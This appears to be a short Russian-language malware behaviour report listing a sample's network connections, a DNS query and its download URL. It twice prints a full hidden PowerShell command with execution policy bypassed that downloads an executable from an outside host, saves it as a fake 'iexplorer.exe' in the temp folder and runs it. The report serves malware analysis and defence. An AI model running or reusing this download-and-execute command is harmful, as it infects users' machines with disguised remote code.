Техническая информация
- http://www.jagadishchristian.com/new/alert.exe как %temp%\\iexplorer.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.jagadishchristian.com/new/alert.exe','%TEMP%\\iexplorer.exe') & %TEMP%\\iexplorer.exe
- 'ja#####hchristian.com':80
- 'ja#####hchristian.com':443
- http://www.ja#####hchristian.com/new/alert.exe
- 'ja#####hchristian.com':443
- DNS ASK ja#####hchristian.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.jagadishchristian.com/new/alert.exe','%TEMP%\\iexplorer.exe') & %TEMP%\\iexplorer.exe' (со скрытым окном)